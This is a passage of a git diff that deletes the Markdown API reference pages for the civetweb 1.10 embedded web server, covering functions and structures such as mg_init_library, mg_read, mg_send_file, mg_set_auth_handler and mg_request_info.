-The function `mg_handle_form_request()` processes form data on a connection. The function uses callback functions for the heavy lifting which are passed to the function as fields in a [`struct mg_form_data_handler`](mg_form_data_handler.md) structure. The number of processed fields is returned by the function, or a negative value when an error occured. I nthe situation where some fields are processed successfully (for example file downloads) and an error occurs later in the form processing, the function still returns a negative value. It is the responsibility of the calling party to do the necessary cleanup. The calling party should also do the cleanup of any files which are created, but not required anymore later.
-
-### See Also
-
-* [`struct mg_form_data_handler;`](mg_form_data_handler.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_header.md b/thirdparty/civetweb-1.10/docs/api/mg_header.md
deleted file mode 100644
index 403dc88..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_header.md
+++ /dev/null
@@ -1,18 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_header;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`name`**|`const char *`| The name of the client request header |
-|**`value`**|`const char *`| The value of the client request header |
-
-### Description
-
-The structure `mg_header` is used as a sub-structure in the [`struct mg_request_info;`](mg_request_info.md) structure to store the name and value of one HTTP request header as sent by the client.
-
-### See Also
-
-* [`struct mg_request_info;`](mg_request_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_init_library.md b/thirdparty/civetweb-1.10/docs/api/mg_init_library.md
deleted file mode 100644
index f0d2c46..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_init_library.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# Civetweb API Reference
-
-### `mg_init_library( feature );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`feature`**|`unsigned`| A bitmask indicating the features to be ininialized |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`unsigned`| A value indicating the initialized features is available. **0** is returned or error |
-
-### Description
-
-The function `mg_init_library()` should be called from an application program before using any other function.
-It must be called only from one thread (it is not guaranteed to be thread safe).
-
-This function is new in version 1.9 (as dummy implementation) and effective only from version 1.10.
-For compatibility reasons, other functions (such as [`mg_start();`](mg_start.md)) will initialize the required features as well,
-but they will no longer do a de-initialization, leaving a memory leak when the library is unloaded.
-
-The following parameter values can be used:
-
-| Value | Compilation option | Description |
-| :---: | :---: | :--- |
-| **1** | NO_FILES | *Able to serve files*.  If this feature is available, the webserver is able to serve files directly from a directory tree. |
-| **2** | NO_SSL | *Support for HTTPS*. If this feature is available, the webserver van use encryption in the client-server connection. SSLv2, SSLv3, TLSv1.0, TLSv1.1 and TLSv1.2 are supported depending on the SSL library CivetWeb has been compiled with, but which protocols are used effectively when the server is running is dependent on the options used when the server is started. |
-| **4** | NO_CGI | *Support for CGI*. If this feature is available, external CGI scripts can be called by the webserver. |
-| **8** | USE_IPV6 | *Support IPv6*. The CivetWeb library is capable of communicating over both IPv4 and IPv6, but IPv6 support is only available if it has been enabled at compile time. |
-| **16** | USE_WEBSOCKET | Support for web sockets. WebSockets support is available in the CivetWeb library if the proper options has been used during cimpile time. |
-| **32** | USE_LUA | *Support for Lua scripts and Lua server pages*. CivetWeb supports server side scripting through the Lua language, if that has been enabled at compile time. Lua is an efficient scripting language which is less resource heavy than for example PHP. |
-| **64** | USE_DUKTAPE | *Support for server side JavaScript*. Server side JavaScript can be used for dynamic page generation if the proper options have been set at compile time. Please note that client side JavaScript execution is always available if it has been enabled in the connecting browser. |
-| **128** | NO_CACHING | *Support for caching*. The webserver will support caching, if it has not been disabled while compiling the library. |
-
-The parameters can added using bitwise or. Values above 255 are reserved, the behavior of the function is undefined if any unknown bit is set.
-
-### See Also
-
-* [`mg_check_feature( feature );`](api/mg_check_feature.md)
-* [`mg_exit_library( feature );`](api/mg_exit_library.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_lock_connection.md b/thirdparty/civetweb-1.10/docs/api/mg_lock_connection.md
deleted file mode 100644
index 167f922..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_lock_connection.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_lock_connection( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-|**`conn`**|`struct mg_connection *`|The connection to retrieve a lock|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_lock_connection()` is specifically for websocket connections to lock connection. Using this function in combination with [`mg_unlock_connection();`](mg_unlock_connection.md) is necessary around [`mg_write()`](mg_write.md) and [`mg_printf()`](mg_printf.md) calls if the code has server-initiated communication, as well as with communication in direct response to a message.
-
-### See Also
-
-* [`mg_lock_context();`](mg_lock_context.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_unlock_context();`](mg_unlock_context.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_lock_context.md b/thirdparty/civetweb-1.10/docs/api/mg_lock_context.md
deleted file mode 100644
index 8be6bac..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_lock_context.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_lock_context( ctx );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context to put the lock on|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_lock_context()` can be used to acquire a lock for exclusive access to resources which are shared between connection of threads. The lock is context wide. The lock must be released with a call to [`mg_unlock_context()`](mg_unlock_context.md).
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_unlock_context();`](mg_unlock_context.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_md5.md b/thirdparty/civetweb-1.10/docs/api/mg_md5.md
deleted file mode 100644
index 067a6a2..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_md5.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_md5( buf, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`buf`**|`char[33]`|Storage buffer for the calculated MD5 sum|
-|**`...`**|`char *, ...`|NULL terminated list of pointers to strings with data|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`char *`|Pointer to the resulting MD5 string|
-
-### Description
-
-The function `mg_md5()` caluclates the MD5 checksum of a NULL terminated list of NUL terminated ASCII strings. The MD5 checksum is returned in human readable format as an MD5 string in a caller supplied buffer.
-
-The function returns a pointer to the supplied result buffer.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_modify_passwords_file.md b/thirdparty/civetweb-1.10/docs/api/mg_modify_passwords_file.md
deleted file mode 100644
index edb5f02..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_modify_passwords_file.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Civetweb API Reference
-
-### `mg_modify_passwords_file( passwords_file_name, domain, user, password );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`passwords_file_name`**|`const char *`|The path to the passwords file|
-|**`realm`**|`const char *`|The authentication realm (domain) of the user record|
-|**`user`**|`const char *`|Username of the record to be added, changed or deleted|
-|**`password`**|`const char *`|Password associated with the user or NULL if the record must be deleted|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success or error code|
-
-### Description
-
-The function `mg_modify_passwords_file()` allows an application to manipulate .htpasswd files on the fly by adding, deleting and changing user records. This is one of the several ways to implement authentication on the server side.
-
-If the password parameter is not `NULL` an entry is added to the password file. An existing records is modified in that case. If `NULL` is used as the password the enrty is removed from the file.
-
-The function returns 1 when successful and 0 if an error occurs.
-
-### See Also
-
-* [`mg_check_digest_access_authentication();`](mg_check_digest_access_authentication.md)
-* [`mg_send_digest_access_authentication_request();`](mg_send_digest_access_authentication_request.md)
-
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_option.md b/thirdparty/civetweb-1.10/docs/api/mg_option.md
deleted file mode 100644
index dd7f090..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_option.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_option;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`name`**|`const char *`|Name of the option|
-|**`type`**|`int`|Type of the option|
-|**`default_value`**|`const char *`|Value of the option|
-
-### Description
-
-A list of valid configuration options of the Civetweb instance can be retrieved with a call to [`mg_get_valid_options()`](mg_get_valid_options.md). This function fills a list of `struct mg_option` structures where the content of each structure represents a configuration option. Each structure contains three fields. One field contains the name of the option, the second contains the value of the option and the third is an identifier used to define the type of the option and how the value contents should be interpreted.
-
-The field `type` can be one of the following values:
-
-|Value|Description|
-| :--- | :--- |
-|**`CONFIG_TYPE_UNKNOWN`**|The type of the option value is unknown|
-|**`CONFIG_TYPE_NUMBER`**|The option value is an integer|
-|**`CONFIG_TYPE_STRING`**|The option value is a number|
-|**`CONFIG_TYPE_FILE`**|The option value is a file name|
-|**`CONFIG_TYPE_DIRECTORY`**|The option value is a directory name|
-|**`CONFIG_TYPE_BOOLEAN`**|The option value is a boolean|
-|**`CONFIG_TYPE_EXT_PATTERN`**|The option value is a list of regular expression patterns|
-
-### See Also
-
-* [`mg_get_valid_options();`](mg_get_valid_options.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_printf.md b/thirdparty/civetweb-1.10/docs/api/mg_printf.md
deleted file mode 100644
index 8beb9c0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_printf.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_printf( conn, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the data must be sent|
-|**`fmt`**|`const char *`|Format string|
-|**`...`**|*various*|Parameters as specified in the format string|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Number of bytes written or an error code|
-
-### Description
-
-The function `mg_printf()` can be used to send formatted strings over a connection. The functionality is comparable to the `printf()` family of functions in the standard C library. The function returns **0** when the connection has been closed, **-1** if an error occurred and otherwise the number of bytes written over the connection. Except for the formatting part, the `mg_printf()` function is identical to the function [`mg_write()`](mg_write.md).
-
-### See Also
-
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_read.md b/thirdparty/civetweb-1.10/docs/api/mg_read.md
deleted file mode 100644
index c7ec6c3..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_read.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_read( conn, buf, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`buf`**|`void *`| A pointer to the location where the received data can be stored |
-|**`len`**|`size_t`| The maximum number of bytes to be stored in the buffer |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| The number of read bytes, or a status indication |
-
-### Description
-
-The function `mg_read()` receives data over an existing connection. The data is handled as binary and is stored in a buffer whose address has been provided as a parameter. The function returns the number of read bytes when successful, the value **0** when the connection has been closed by peer and a negative value when no more data could be read from the connection.
-
-### See Also
-
-* [`mg_printf();`](mg_printf.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_request_info.md b/thirdparty/civetweb-1.10/docs/api/mg_request_info.md
deleted file mode 100644
index cad6bbc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_request_info.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_request_info;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`request_method`**|`const char *`| The request method used by the client for the connection this can be **GET**, **POST** or one of the other common HTTP request methods |
-|**`request_uri`**|`const char *`| The absolute, relative or URL-encoded URI as it was sent in the request.  Example: "http://mydomain.com:8080/path/to/file.ext" or "/path/to/file.ext", depending on the client. |
-|**`local_uri`**|`const char *`| The relative URL-encoded URI as it references the local resource. If the request URI does not reference a resource on the local server, this field is NULL.  Example: "/path/to/file.ext" (even if the client used "http://mydomain.com:8080/path/to/file.ext" in the request) |
-|~~`uri`~~|`const char *`| *Deprecated. Use* `local_uri` *instead* |
-|**`http_version`**|`const char *`| The HTTP version as mentioned in the client request. This can be "1.0", "1.1", etc. |
-|**`query_string`**|`const char *`| The HTTP query string, defined as URL part after the first '?' character, not including '?'. NULL if there is no '?'. |
-|**`remote_user`**|`const char *`| The name of the authenticated remote user, or NULL if no authentication was used. Only used for HTTP (digest) authentication, not for cookie based authentication. |
-|**`remote addr`**|`char[48]`| The IP address of the remote client as a string. This can either represent an IPv4 or an IPv6 address.  Example: "127.0.0.1" |
-|~~`remote_ip`~~|`long`| *Deprecated. Use* `remote_addr` *instead* |
-|**`content_length`**|`long long`| The content length of the request body. This value can be -1 if no content length was provided. The request may still have body data, but the server cannot determine the length until all data has arrived (e.g. when the client closes the connection, or the final chunk of a chunked request has been received). |
-|**`remote_port`**|`int`| The port number at the client's side (an integer number between 1 and 65535). |
-|**`is_ssl`**|`int`| 1 if the connection is over SSL (https), and 0 if it is a plain connection (http) |
-|**`user_data`**|`void *`| A pointer to the `user_data` information which was provided as a parameter to `mg_start()`. |
-|**`conn_data`**|`void *`| A pointer to connection specific user data |
-|**`num_headers`**|`int`| The number of HTTP request headers sent by the client (see http_headers) |
-|**`http_headers`**|`struct mg_header[64]`| Array of structures with the HTTP request headers sent by the client. For the number of filled header fields, ee num_headers. |
-|**`client_cert`**|`struct mg_client_cert *`| Pointer to the client certificate information, when available. This field is only filled for https connections using client certificates. |
-
-### Description
-
-The `mg_request_info` structure contains the client information of an existing connection.
-
-### See Also
-
-* [`struct mg_client_cert;`](mg_client_cert.md)
-* [`struct mg_header;`](mg_header.md)
-* [`mg_get_request_info();`](mg_get_request_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_response_info.md b/thirdparty/civetweb-1.10/docs/api/mg_response_info.md
deleted file mode 100644
index a348dfc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_response_info.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_response_info;`
-
-### Fields
-
-struct mg_response_info {
-        int status_code;          /* E.g. 200 */
-        const char *status_text;  /* E.g. "OK" */
-        const char *http_version; /* E.g. "1.0", "1.1" */
-
-        long long content_length; /* Length (in bytes) of the request body,
-                                     can be -1 if no length was given. */
-
-        int num_headers; /* Number of HTTP headers */
-        struct mg_header
-            http_headers[MG_MAX_HEADERS]; /* Allocate maximum headers */
-};
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`status code`**|`int`| The HTTP response code received by the client. |
-|**`status_text`**|`const char *`| The textual representation of the HTTP status code. |
-|**`http_version`**|`const char *`| The HTTP version as mentioned in the client request. This can be "1.0", "1.1", etc. |
-|**`content_length`**|`long long`| The content length of the request body. This value can be -1 if no content length was provided. The request may still have body data, but the server cannot determine the length until all data has arrived (e.g. when the client closes the connection, or the final chunk of a chunked request has been received). |
-|**`num_headers`**|`int`| The number of HTTP request headers sent by the client (see http_headers) |
-|**`http_headers`**|`struct mg_header[64]`| Array of structures with the HTTP request headers sent by the client. For the number of filled header fields, ee num_headers. |
-
-Note: This structure is not yet feature complete and will be extended in future versions.
-
-### Description
-
-The `mg_response_info` structure contains information on a completed request from a client.
-
-### See Also
-
-* [`struct mg_header;`](mg_header.md)
-* [`mg_get_response_info();`](mg_get_response_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_chunk.md b/thirdparty/civetweb-1.10/docs/api/mg_send_chunk.md
deleted file mode 100644
index 895ffdc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_chunk.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_chunk( conn, buf, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`chunk`**|`const void *`| A pointer to the blob of information to be sent |
-|**`chunk_len`**|`size_t`| The amount of bytes to be sent |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating the amount of bytes sent, or failure |
-
-### Description
-
-The function `mg_send_chunk()` can be used to send a blob of arbitrary data over a connection. 
-Only use this function after sending a complete HTTP request or response header with "Transfer-Encoding: chunked" set. Otherwise: use `mg_write()`.
-The function returns a number **>0** if data was sent, the value **0** when the connection has been closed, and **-1** in case of an error.
-
-### See Also
-
-* [`mg_write();`](mg_write.md)
-* [`mg_printf();`](mg_print.md)
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_digest_access_authentication_request.md b/thirdparty/civetweb-1.10/docs/api/mg_send_digest_access_authentication_request.md
deleted file mode 100644
index d5af9da..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_digest_access_authentication_request.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_digest_access_authentication_request( conn, realm );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`realm`**|`const char *`| The requested authentication realm or NULL |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating success or failure |
-
-### Description
-
-This function can be used to send a HTTP Digest Authentication request to the client.
-Browsers will react with repeating the request with user authentication data.
-If they do not yet know the user authentication for the requested realm, they will show
-a dialog to query username and password.
-In case the authentication realm (also called domain) is NULL, the parameter
-`authentication_domain` from the server configuration is used.
-The function returns a negative number on errors.
-
-### See Also
-
-* [`mg_check_digest_access_authentication();`](mg_check_digest_access_authentication.md)
-* [`mg_modify_passwords_file();`](mg_modify_passwords_file.md)
-* [`mg_send_http_error();`](mg_send_http_error.md)
-* [`mg_write();`](mg_write.md)
-* [`mg_printf();`](mg_print.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_file.md b/thirdparty/civetweb-1.10/docs/api/mg_send_file.md
deleted file mode 100644
index bffe075..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_file.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_file( conn, path );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the file must be sent|
-|**`path`**|`const char *`|The full path and filename of the file|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_send_file()` sends the contents of a file over a connection to the remote peer. The function also adds the necessary HTTP headers.
-
-### See Also
-
-* [`mg_printf();`](mg_printf.md)
-* [`mg_send_mime_file();`](mg_send_mime_file.md)
-* [`mg_send_mime_file2();`](mg_send_mime_file2.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_http_error.md b/thirdparty/civetweb-1.10/docs/api/mg_send_http_error.md
deleted file mode 100644
index 0c18d3e..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_http_error.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_http_error( conn, status_code, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the data must be sent|
-|**`status_code`**|`int`|The HTTP status code (see HTTP standard)|
-|**`fmt`**|`const char *`|Format string for an error message|
-|**`...`**|*various*|Parameters as specified in the format string|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-
-
-### Description
-
-The function `mg_send_http_error()` can be used to send HTTP error messages from a server to a client.
-The `status_code` must be one of the predefined HTTP standard error codes (e.g., "404" for "Not Found").
-The status text (e.g., "Not Found") for standard error codes is known by this function.
-A body of the error message, to explain the error in more detail, can be specified using the `fmt` format specifier and additional arguments. The `fmt` format specifier works like for the `printf()` function in the standard C library.
-
-
-### See Also
-
-* [`mg_printf();`](mg_printf.md)
-* [`mg_write();`](mg_write.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file.md b/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file.md
deleted file mode 100644
index 424b0dc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_mime_file( conn, path, mime_type );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the file must be sent|
-|**`path`**|`const char *`|The full path and filename of the file|
-|**`mime_type`**|`const char *`|The mime type of the file, or NULL for automatic detection|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_send_mime_file()` sends a file over a connection including the HTTP headers. The function is similar to the [`mg_send_file()`](mg_send_file.md) with the additional functionality that the MIME type of the file can be specified. If the `mime_type` parameter is NULL, the routine will try to determine the MIME type based on the extension of the filename.
-
-### See Also
-
-* [`mg_get_builtin_mime_type();`](mg_get_builtin_mime_type.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_send_file();`](mg_send_file.md)
-* [`mg_send_mime_file2();`](mg_send_mime_file2.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file2.md b/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file2.md
deleted file mode 100644
index 1350df8..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_send_mime_file2.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_send_mime_file2( conn, path, mime_type, additional_headers );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection over which the file must be sent|
-|**`path`**|`const char *`|The full path and filename of the file|
-|**`mime_type`**|`const char *`|The mime type or NULL for automatic detection|
-|**`additional_headers`**|`const char *`|Additional headers to be sent|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_send_mime_file2()` can be used to send a file over a connection. The function is similar to [`mg_send_mime_file()`](mg_send_mime_file.md) with the additional functionality that user specified headers can be sent. The MIME type of the file can be specified in the function call, or will be automatically determined based on the extension of the filename if the `mime_type` parameter has the value NULL.
-
-Additional custom header fields can be added as a parameter. Please make sure that these header names begin with `X-` to prevent name clashes with other headers. If the `additional_headers` parameter is NULL, no custom headers will be added.
-
-### See Also
-
-* [`mg_get_builtin_mime_type();`](mg_get_builtin_mime_type.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_send_file();`](mg_send_file.md)
-* [`mg_send_mime_file();`](mg_send_mime_file.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_server_ports.md b/thirdparty/civetweb-1.10/docs/api/mg_server_ports.md
deleted file mode 100644
index e969f03..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_server_ports.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_server_ports;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`protocol`**|`int`|The protocol mask where `IPv4` is **1**, `IPv6` is **2** and both `IPv4` and `IPv6` is **3**|
-|**`port`**|`int`|The port number on which the service listens|
-|**`is_ssl`**|`int`|**0** for `HTTP` communication, **1** for `HTTPS`|
-|**`is_redirect`**|`int`|**1** if all requests are redirected, otherwise **0**|
-|**`_reserved1`**|`int`|Reserved for internal use|
-|**`_reserved2`**|`int`|Reserved for internal use|
-|**`_reserved3`**|`int`|Reserved for internal use|
-|**`_reserved4`**|`int`|Reserved for internal use|
-
-### Description
-
-A call to the function [`mg_get_server_ports()`](mg_get_server_ports.md) returns a list of structures with information about each running Civetweb service. These structures are of type `struct mg_server_ports` and contain the base information of each service.
-
-### See Also
-
-* [`mg_get_server_ports();`](mg_get_server_ports.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_auth_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_set_auth_handler.md
deleted file mode 100644
index 302324a..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_auth_handler.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_auth_handler( ctx, uri, handler, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context on which the handler must be set|
-|**`uri`**|`const char *`|The URI for the authorization handler|
-|**`handler`**|`mg_authorization_handler`|Callback function doing the actual authorization|
-|**`cbdata`**|`void *`|Optional user data|
-
-`int mg_authorization_handler( struct mg_connection *conn, void *cbdata );`
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_auth_handler()` hooks an authorization function to an URI to check if a user is authorized to visit that URI. The check is performed by a callback function of type `mg_authorization_handler`. The callback function is passed two parameters: the current connection and a pointer to optional user defined data which was passed to `mg_set_auth_handler()` when the callback was hooked to the URI.
-
-The callback function can return **0** to deny access, and **1** to allow access.
-
-The `mg_set_auth_handler()` function is very similar in use to [`mg_set_request_handler()`](mg_set_request_handler.md).
-
-### See Also
-
-* [`mg_set_request_handler();`](mg_set_request_handler.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_request_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_set_request_handler.md
deleted file mode 100644
index 95a09a0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_request_handler.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_request_handler( ctx, uri, handler, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context where the handler must be active|
-|**`uri`**|`const char *`|The URI to hook the handler on|
-|**`handler`**|`mg_request_handler`|Callback function doing the heavy lifting|
-|**`cbdata`**|`void *`|Optional user supplied data|
-
-`int mg_request_handler( struct mg_connection *conn, void *cbdata );`
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_request_handler()` hooks a callback function on a URI. That callback function is called whenever a client requests the specific URI. The callback function receives the connection information and optional user supplied data as parameters and can serve information back to the client. When the callback function does not send any information back to the client, it should return **0** to signal Civetweb that the Civetweb core should handle the request. A return value between 1 and 999 is used to tell Civetweb that the request has been handled and no further processing is necessary. The returned code is stored as the status code in the access log, it is therefore recommended, although not mandatory to return a status code which matches the state of the request.
-
-### See Also
-
-* [`mg_set_auth_handler();`](mg_set_auth_handler.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_user_connection_data.md b/thirdparty/civetweb-1.10/docs/api/mg_set_user_connection_data.md
deleted file mode 100644
index adafc22..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_user_connection_data.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_user_connection_data( conn, data );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|connection to add the user data|
-|**`data`**|`void *`|Pointer to the user data|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_set_user_connection_data()` can be used to set a user defined
-data pointer attached to a connection.  This value can be read using 
-`mg_get_user_connection_data()`.
-Any call to `mg_set_user_connection_data()` will overwrite a previously
-assigned user data pointer.
-
-`mg_set_user_connection_data()` requires a non-const 
-`struct mg_connection *` to set the user data pointer.  It is save to use the
-`const struct mg_connection *` passed to a websocket connect handler (with a
-const cast), since `const` just means you must not use `mg_read()` or
-`mg_write()` in this context.
-
-Alternatively, you can use the `init_connection` callback in 
-`struct mg_callbacks` to set the user data pointer.
-In this case, typically `init_connection` is used to allocate memory for
-a user defined `struct`, while `connection_close` is used to free this
-memory again.
-
-
-### See Also
-
-* [`mg_get_user_connection_data();`](mg_get_user_connection_data.md)
-* [`struct mg_callbacks`](mg_callbacks.md)
-* [`mg_set_websocket_handler();`](mg_set_websocket_handler.md)
-* [`mg_read();`](mg_read.md)
-* [`mg_write();`](mg_write.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_set_websocket_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_set_websocket_handler.md
deleted file mode 100644
index f838c81..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_set_websocket_handler.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_set_websocket_handler( ctx, uri, connect_handler, ready_handler, data_handler, close_handler, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`mg_context *`|The context in which to add the handlers|
-|**`uri`**|`const char *`|The URI for which the handlers should be activated|
-|**`connect_handler`**|`mg_websocket_connect_handler`|Handler called when a connect is signalled|
-|**`ready_handler`**|`mg_websocket_ready_handler`|Handler called when the connection is ready|
-|**`data_handler`**|`mg_websocket_data_handler`|Handler called when data is received|
-|**`close_handler`**|`mg_websocket_close_handler`|Handler called when the connection closes|
-|**`cbdata`**|`void *`|User defined data|
-
-`int mg_websocket_connect_handler( const struct mg_connection *conn, void *cbdata );`
